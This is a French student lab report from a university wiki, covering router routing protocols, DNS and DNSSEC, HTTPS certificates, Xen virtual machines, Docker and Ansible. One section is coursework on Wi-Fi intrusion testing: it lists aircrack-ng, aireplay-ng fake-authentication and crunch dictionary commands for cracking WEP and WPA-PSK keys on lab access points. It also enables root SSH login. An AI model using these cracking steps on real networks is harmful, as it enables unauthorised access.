=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôtes contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôte contenant toutes les VMs privées (la ferme de serveurs Web)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52026</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
